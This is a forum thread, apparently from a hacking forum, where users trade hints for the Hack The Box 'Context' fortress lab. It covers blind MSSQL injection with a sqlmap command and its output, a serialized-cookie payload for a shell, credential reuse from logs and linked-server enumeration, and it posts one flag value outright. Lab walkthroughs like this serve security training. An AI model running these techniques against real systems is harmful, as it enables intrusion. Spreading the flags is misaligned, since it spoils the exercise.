TUTORIAL CONTEXT fortress
by sh00t - November 16, 2020 at 03:31 PM
#13
(November 16, 2020 at 03:31 PM)sh00t Wrote: 1.look at source code in the staff page
2.sqli after login in "&certified=1" parameter db=mssql type=blind time based 
3.login to emails with use password from 1st step switch between email from staff page to find the flag and info to go further

What is login username and password
Please help
#14
any help on 5th flag I don't find the credentials in the logs
#15
(December 03, 2020 at 10:33 AM)sh00t Wrote:
(December 01, 2020 at 04:22 AM)esh_din1 Wrote: Any updates on 4th,5,6,7 flags

4- add 'Profile=serialized' to the cookie and get shell C:\Users\Public\flag.txt

5-after shell look up for creds in log and use em to login to db then extract flag from linked server there

if u found about 6 7 dont forget me mate

I guess I'm stuck with what to do with the cookie and how to get the shell?  Are we talking an os-shell through sqlmap?  Totally lost and need some help.
#16
(December 01, 2020 at 04:22 AM)esh_din1 Wrote: Any updates on 4th,5,6,7 flags


Can u plz be more specific i am trying to put Profile="Serialized Payload using YSOSERIAL but unable to get anything back.Tried almost all common collections of ysoserial but  did not work for me "
#17
sudo sqlmap -r request.txt --random-agent --force-ssl --technique=T --dbms=mssql --dbs

[11:40:14] [WARNING] heuristic (basic) test shows that POST parameter 'certified' might not be injectable
[11:40:15] [INFO] testing for SQL injection on POST parameter 'certified'
[11:40:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:40:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:40:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[11:40:35] [INFO] testing 'Oracle AND time-based blind'
[11:40:42] [WARNING] POST parameter 'certified' does not seem to be injectable


any solution
or plz someone share with us the second flag and the credential to pass to the next step
I will be grateful if someone can send me this information.
#18
You have delete parameter "--technique" ;)


(January 12, 2021 at 12:50 PM)dafdo Wrote: sudo sqlmap -r request.txt --random-agent --force-ssl --technique=T --dbms=mssql --dbs

[11:40:14] [WARNING] heuristic (basic) test shows that POST parameter 'certified' might not be injectable
[11:40:15] [INFO] testing for SQL injection on POST parameter 'certified'
[11:40:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:40:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:40:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[11:40:35] [INFO] testing 'Oracle AND time-based blind'
[11:40:42] [WARNING] POST parameter 'certified' does not seem to be injectable


any solution
or plz someone share with us the second flag and the credential to pass to the next step
I will be grateful if someone can send me this information.
#19
yes I deleted this option but still the same problem "no result"
if anyone can help me just DM me at discord: dafdo # 0154
(January 12, 2021 at 10:45 PM)odinenet Wrote: You have delete parameter "--technique" ;)


(January 12, 2021 at 12:50 PM)dafdo Wrote: sudo sqlmap -r request.txt --random-agent --force-ssl --technique=T --dbms=mssql --dbs

[11:40:14] [WARNING] heuristic (basic) test shows that POST parameter 'certified' might not be injectable
[11:40:15] [INFO] testing for SQL injection on POST parameter 'certified'
[11:40:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:40:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:40:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[11:40:35] [INFO] testing 'Oracle AND time-based blind'
[11:40:42] [WARNING] POST parameter 'certified' does not seem to be injectable


any solution
or plz someone share with us the second flag and the credential to pass to the next step
I will be grateful if someone can send me this information.
#20
yes please if can someone share 2 flag stuck
#21
(November 16, 2020 at 03:31 PM)sh00t Wrote: 1.look at source code in the staff page
2.sqli after login in "&certified=1" parameter db=mssql type=blind time based 
3.login to emails with use password from 1st step switch between email from staff page to find the flag and info to go further
any clear idea for third flag ? cuz database username passwords are not working for owa
#22
CONTEXT{s3cur1ty_thr0ugh_0bscur1ty}

anyone have 2/3 flag please post
#23
it seems the 6th flag is running clr assembly in the web\clients db https://blog.netspi.com/attacking-sql-se...ssemblies/ .. i have not done yet but maybe this well help others
#24
karl.memaybe can run BackupClients on the linked server
select name,
has_perms_by_name(name, 'OBJECT', 'EXECUTE') as has_execute,
has_perms_by_name(name, 'OBJECT', 'VIEW DEFINITION') as has_view_definition
from [WEB\CLIENTS].clients.sys.procedures

But the linked server has RPC disabled and I can't login to WEB\CLIENTS db. I only got sqsh to work with the WEB\DB mssql server, no other client will connect with karl's creds. Any hints?

Possibly Related Threads…
Thread Author Replies Views Last Post
FLAG HTB CHALLENGE, FORTRESS ALL FLAG staymkz 21 5,565 Yesterday at 08:29 AM
Last Post: x00xFF
SELLING CONTEXT ENDGAME ALL FLAGS (FREE) quas4r 2 619 March 15, 2021 at 11:38 AM
Last Post: willywonker
FLAG HTB Fortress Flags Jet bugbunny 0 461 February 28, 2021 at 03:39 PM
Last Post: bugbunny

 Users browsing this thread: 1 Guest(s)